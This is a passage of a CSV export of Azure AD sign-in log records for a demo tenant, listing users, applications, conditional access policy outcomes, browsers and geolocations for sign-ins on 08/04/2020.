'4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",65ce963c-c870-4311-8389-19e518d50c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,65ce963c-c870-4311-8389-19e518d50c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1101,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:58.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c811973-7dd8-458d-8675-48f4aaddbe23,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3ce03341400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,5f11d930-41ca-43a7-b362-f3ce03341400,SigninLogs,Sucess,33.7984581,-84.38828278
+1102,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:30.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ccd469f-7038-0000-5421-79fcb5769fe0,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4445394f-bc55-4988-8502-680df6091600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4445394f-bc55-4988-8502-680df6091600,SigninLogs,Sucess,41.90428925,-85.99833679
+1103,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:47.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5c5e60be-0296-4fc6-bbb2-9ca593cfa831,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3b0e5c51-5aba-4adb-89c0-6eab2e251500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3b0e5c51-5aba-4adb-89c0-6eab2e251500,SigninLogs,Sucess,41.90428925,-85.99833679
+1104,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:58.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,046b745e-238b-40a1-9d77-9f39e688e946,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc02b4b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,dfda3bbc-b55b-4a89-a1fb-2fc02b4b1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1105,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:38.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f53b786b-165f-4251-a8b8-1d165715d9e1,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",89223cb6-60af-4a3e-b2e1-947017641400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,89223cb6-60af-4a3e-b2e1-947017641400,SigninLogs,Sucess,41.90428925,-85.99833679
+1106,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:44.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8f205a00-e1f9-4f94-886a-fdd60925c83e,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",3c1797ce-9a4e-4e19-b7f0-81e01e2d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3c1797ce-9a4e-4e19-b7f0-81e01e2d1400,SigninLogs,Sucess,38.73078156,-78.17196655
+1107,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:29.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc9e3900-24dd-41a9-87ad-37f07e461673,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",011e8186-a783-421c-9de9-872062101400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,011e8186-a783-421c-9de9-872062101400,SigninLogs,Sucess,41.90428925,-85.99833679
+1108,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bbc03de8-5534-403d-9574-833e452780c9,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 